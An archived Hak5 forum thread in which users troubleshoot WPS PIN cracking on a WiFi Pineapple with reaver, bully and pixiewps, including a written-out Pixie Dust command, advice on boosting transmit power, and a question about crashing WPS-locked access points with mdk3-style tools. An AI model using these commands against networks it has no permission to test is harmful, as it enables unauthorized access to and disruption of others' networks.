Jump to content
Hak5 Forums

Archived

This topic is now archived and is closed to further replies.

Recommended Posts

I will send an update to include additional checks for SD install of reaver.

I haven't installed anything on the SD card though. I updated the firmware, installed the infusion and then everything else ( reaver, bully, pixiewps ) on internal storage. Any idea what might be causing all the above?

Share this post


Link to post
Share on other sites

The new firmware, as you know, now uses the latest aircrack which sets as wlanxmon. The infusion, was designed before this update. So there needs to be an update to scan with wlanxmon.

As with reaver and bully not associating, while you do have a good signal strength, there could be interference somewhere. Have you tried upping your txpower on the attacking interface? If not, try setting it to 30dBm.

Share this post


Link to post
Share on other sites

The new firmware, as you know, now uses the latest aircrack which sets as wlanxmon. The infusion, was designed before this update. So there needs to be an update to scan with wlanxmon.

As with reaver and bully not associating, while you do have a good signal strength, there could be interference somewhere. Have you tried upping your txpower on the attacking interface? If not, try setting it to 30dBm.

I literally just got my Pineapple 2 days ago, didn't know what has been going on with the infusion.

But yeah I SSHed into the pineapple, used wash and tried reaver again, still timeouts for the APs that in my experience would have worked before - RSSI between -60 and -68 .

How can I increase the TXpower though on wlan1? I've tried the usual ifconfig command but it's not working. Also, how much is it safe to increase it and for how long on the pineapple ?

Thank you.

Share this post


Link to post
Share on other sites

I literally just got my Pineapple 2 days ago, didn't know what has been going on with the infusion.

But yeah I SSHed into the pineapple, used wash and tried reaver again, still timeouts for the APs that in my experience would have worked before - RSSI between -60 and -68 .

How can I increase the TXpower though on wlan1? I've tried the usual ifconfig command but it's not working. Also, how much is it safe to increase it and for how long on the pineapple ?

Thank you.

If your local laws permit to upping and using 30dBm, you should be fine running the rtl8187 (wlan1) for quite some time. You should be fine running at that for a few hours. Just let it take a break for a while if you don't have a fan cooling it on the bottom vents.

Share this post


Link to post
Share on other sites

If your local laws permit to upping and using 30dBm, you should be fine running the rtl8187 (wlan1) for quite some time. You should be fine running at that for a few hours. Just let it take a break for a while if you don't have a fan cooling it on the bottom vents.

Cheers that worked, got a couple of more questions though.

How can I permanently modify the region&txpower so I don't have to change it every time?

Also, what the heck is the problem with reaver? I tested it on a couple of different APs and so far all I got were either timeouts ( 90% of the time ), or it worked for the first pin, after which it timed out again. These were all all -58 to -68 which should've been enough. Instead, I figured I should give bully a shot, any funny enough after trying a reaver attack and a bully one successively on each AP, bully actually worked about 80% of the time. I'm going to get a 9 dBi antenna tomorrow and give it another shot.

And finally, are there any ways to crash an AP which has locked the WPS? I know about mdk3 attacks and I remember trying the revdk3 script a while ago, but with no results unfortunately. Are there any similar tools available for the pineapple? Or for Kali? I found another thread about using wlan1 with Kali so I will try that if there are any alternatives to revdk3.

Thanks for all the help though.

Share this post


Link to post
Share on other sites

The problem you are having with reaver seems it could be fixed with setting a timeout length. I am unsure of which switch(s) it is at the moment, but reaver --help will outline this for you.

Reaver can be a bit more picky than bully at times, and vise versa. But I suspect that issues you and a few others are having, is a quality of the signal, not just the strength. So try with a different antenna, the 9dbi works nicely.

Also, for setting the txpower on boot, you can use a dipswitch setup to run the commands :-)

Share this post


Link to post
Share on other sites

Having a couple issues. First off, running reaver (just a simple, "reaver -i wlan1mon") doesn't return any results. Tested this by turning WPS on my home router and a couple test routers as well, no dice. It can the the broadcasted SSIDs in the WPS infusion interface though. Second, and somewhat related, the table that shows all detected APs(so, airodump) has a field for WPS, but all entries are a "-". When I scan the APs with an old AFLA0036 I can see WPS is active on the test routers. I have a sneaking suspicion it's related to the 2.4 firmware and the new version of aircrack, but figured I'd see if anyone else was having similar issues.

Share this post


Link to post
Share on other sites

For the first issue, reaver -i wlanxmon, is invalid use. You must at the least, supply a target bssid ( -b ).

And for airodump, are you doing airodump-ng -i wlanxmon --wps

Share this post


Link to post
Share on other sites

yea it should be reaver -i wlan1mon -b ma:ca:dd:rr:es:ss -vvv -K 1 to start (pixiewps attack) or just a reaver will show all commands and options for it including the fork

btw datahead, any chance of helping out terry's fork for the reaver pro ii? (installed pixie and your fork with a bit of pain on it, but would be nice with his gui)

Share this post


Link to post
Share on other sites

reaver no longer provides wpa pass after cracking wps pin.

And had tested, and it does.

Do you have highest verbose modes enabled?( -vvv )

that should be enabled if not.

also, some AP's do not report back the wpa password, but will with the pin only.

A bit of a self note, i should make a change back to reaver so that only -vv is required again

Share this post


Link to post
Share on other sites

tried with -vvv again and it looks like the -S option borks the process and only spits out the wps pin?

without the -S spits out both pass and pin.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×